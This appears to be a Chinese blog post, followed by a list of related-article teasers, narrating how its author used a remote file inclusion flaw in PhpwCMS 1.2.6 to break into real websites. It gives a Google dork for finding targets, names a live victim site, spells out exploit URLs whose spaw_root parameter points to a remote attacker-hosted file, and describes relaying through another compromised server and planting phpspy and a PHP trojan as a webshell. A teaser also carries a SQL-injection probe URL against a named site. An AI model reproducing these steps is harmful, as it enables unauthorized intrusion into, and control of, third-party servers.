三天内学到文件包含漏洞知识 利用文件包含漏洞提权
一、看见漏洞公告
最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的,PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php
文件中的$spaw_root的没有过滤的情况下,包含’**class/lang.class.php’。具体的代码公告中没给出来。可以利用下面的url利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的网站,website2是攻击的网站,website2所在的目录下有class/lang.class.php文件。
二、学习的第一天
马上行动,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多项结果,基本上都是国外的。看来这次发了,这次国外的wenshell肯定是一大堆了。呵呵……,嘿嘿……随便点击一个网站,是美国的:http://arena-sv.jans-webdesign.com,不知道这个网站有没有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/检测,当然http://www.baidu.com/class/lang.class.php是不存在的,这时页面显示如图一所示,提示没有找到页面。这表明了这个网站存在文件包含漏洞,象这样的有漏洞的网站随便点击一个就是。
检测出有文件包含漏洞
现在开始利用这个漏洞,在我的支持asp网站根目录建一个class的目录,在class里面建lang.class.php文件。但是当我用浏览器浏览http://www.xxxx.xx/class/lang.class.php的时候,提示找不到文件。难道是我的网站所在的服务器没设置好吗?我试着找到了几个webshell,浏览的时候还是出现找不到文件的问题。
三、学习的第二天
去搜索的发现有漏洞的网站变得比较少了,大部分的网站都被漏洞补了,还有一部分美国的网站上被挂了一些与反战争有关的图片或者一些国旗。还好的是昨天的哪个网站没有被人家黑掉,还有机会学习。我在无意中得到了jsp的wenshell,试着写了一个php文件,在浏览器浏览的时候出现的是源文件。看来现在现在可以利用这个jsp的webshell来作跳板。
在webshell里面建一个class的文件夹,然后在class目录里面上传一个lang.class.php空文件,在文件里面写上.在浏览器上浏览http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 显示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。
php环境信息
编辑lang.class.php的文件,先写了一个phpspy。但是登陆webshell的后,页面转到其他的页面。还是先传一可以上传的文件的马儿吧,传了一个国外的php木马,木马的功能很的大,浏览http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。
包含的国外php木马
但是这个国外的php马还是上传一个经过修改的phpspy吧,用着舒服一点,上传得文件改为了imge.php,现在访问http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305,登陆后一台webshell就在我们的眼前了。权限也不错,但是由于是linux系统,也不知道怎么去提权,还是再放一下吧!
phpspy上传成功
四、学习的第三天
对linux下的提权一点都不了解,没办法只有寻求帮助了。Jinsdb师兄叫我去一些好的网站找一下exp看看,他还告诉我了上次在我的网站中的php文件浏览的时候是找不到文件的原因:因为我的系统是2003的,所以要在IIS的ISAPI 筛选器中加.php后缀,在xp下访问php文件直接就可以浏览。看来上次我得到的服务器基本上是2003的。
看来这次的学习也蛮有意义的!发现一点,国外的网站的管理人员比较重视安全。在出现漏洞的第二天,很多网站都把漏洞补了,还有的网站被入侵后能马上发现,并及时清除了webshell。
恶意网站是什么网站?恶意网站的相关知识
当我们在访问一些网站是会弹出一些提示,有时候QQ管家、金山毒霸是经常弹出访问提示,不注意就会扣掉很多钱,那么真正的恶意网站又是怎么一回事,又有多少人彻底的明白呢?一起来看看吧。| 前言恶意网站在大家平
详情2018-01-12 15:27:06责编:llp 来源:驱动管家upx脱壳的方法 破解upx程序的过程
入门级的破解,用ollydbg我用UPX将NOTEPAD EXE加壳,选择OllyDbg 1 09d来脱壳。首先加载被加壳的程序,程序直接定位到01014110 $60 PUSHAD处,选择CTRL F 输入查找内容 "POPAD ",OD定位到0101425E> 61 POPA
详情2018-01-18 16:05:36责编:llp 来源:驱动管家什么是物联网?怎么保证物联网的安全?
物联网(Internet of Things)是一个基于互联网、传统电信网等信息承载体,让所有能够被独立寻址的普通物理对象实现互联互通的网络。它具有普通对象设备化、自治终端互联化和普适服务智能化3个重要特征。物联网安
详情2018-01-11 18:13:51责编:llp 来源:驱动管家fastcgi解析漏洞怎么修复?nginx处理fastcgi解析漏洞的方法
FASTCGI是和HTTP协议类似的概念。无非就是规定了在同一个TCP连接里怎么同时传多个HTTP连接。这实际上导致了个问题,有个HTTP连接传个大文件不肯让出FASTCGI连接,在同一个FASTCGI连接里的其他HTTP连接就傻了。Fas
详情2018-02-01 20:00:14责编:llp 来源:驱动管家nmap有哪些基本功能?nmap基本扫描技术
侦查是什么?侦查是尽可能多的收集目标网络的信息。从黑客的角度来看,信息收集对攻击非常有帮助,一般来说可以收集到以下信息:电子邮件、端口号、操作系统、运行的服务、Traceroute或者DNS的信息、防火墙识别和
详情2018-02-04 16:59:33责编:llp 来源:驱动管家关闭135 445端口该怎么做?关闭135 445端口的步骤
135端口主要用于使用RPC(RemoteProcedureCall,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务。端口说明:135端口主要用于使用RPC(RemoteProcedureCall,远程过程调用)协议并提供DCOM(分布式组件
详情2018-01-14 14:03:30责编:llp 来源:驱动管家什么是缓冲区溢出?缓冲区溢出分析
缓冲溢出弱点诞生于70年代。Morris Worm(80年代)可以认为是它们的第一次公开应用。从90年代开始,相关的文档,如著名的Aleph1的”Smashing the Stack for Fun and Profit”和代码已经在互联网上公开。这篇
详情2018-01-25 18:25:08责编:llp 来源:驱动管家豆包网的小漏洞:搜索型盲注漏洞
豆包网是2015年由北京众信易保科技有限公司推出的一个互联网保险产品优选服务平台。本文主要分析了豆包网的一个小漏洞。漏洞证明:http: www doubao com shop?goodname=%B5%E7%CA%D3%& 39;and 1=2 and & 39;%
详情2018-01-24 13:27:43责编:llp 来源:驱动管家怎么让u盘代替windows系统的密码?
【赛迪网-IT技术报道】U盘 如今可以说非常普及了,不过,如果只是把它用来存储数据的话,也许有点可惜了。其实,我们还可以让U盘发挥更大的能量!今天小编教你一招,能让你的U盘代 替登录系统的密码,只有当你插上U盘才能正常进入系统操作,否则任何操作都无法进入系统。
详情2018-01-17 20:08:26责编:llp 来源:驱动管家html5有哪些安全问题?api攻击有哪些攻击途径?
HTML5里有许多协议、模式和API,可能成为攻击者的攻击途径。一、registerProtocolHandler:信息泄漏HTML5允许某些协议和schema注册为新的特性。例如下面的语句可以注册一个email handler。它会将一个恶意网站处
详情2018-02-06 12:08:33责编:llp 来源:驱动管家
- 微软dns客户端服务漏洞,欺骗Internet通讯
- 安装ubuntu12.04后怎么安装无线网卡驱动?
- 将CentOS服务器目录映射为Windows磁盘驱动器的步骤
- 怎么在电脑上查询农行网银证书到期的时间
- 使用画图工具画图添加文字的时候将画面挡住了怎么办
- 从低端到怪兽!10款最值得推荐的桌面处理器
- 电脑屏幕的显示器不够清晰怎么办?教你这样设置你的显示器
- 交通运输部制定针对押金和预付金的监管办法 即将发布实施
- 李克强:提高个人所得税起征点
- 新买的电脑怎么安装系统?用u盘安装系统的方法
- 怎么在win7系统上自己自定义系统操作快捷键
- 坚果手机测评 千元手机坚果u1如何?
- 么么哒3s刷机步骤 先安装刷机大师
- 多多网游加速器怎么用 多多网游加速器使用教程
- 哪种颜色的导热硅酯效果最好
- Adobe Reader漏洞分析、调试报告
- phpcms v9 blind哪里存在漏洞?参数过滤存在SQL注入漏洞
- linux下安装Nvidia显卡驱动的详细步骤
- 在笔记本电脑的Ubuntu系统上安装Nvidia显卡驱动的方法
- Win10升级助手绿色版1.0.218下载 绿色免安装 解压后即可使用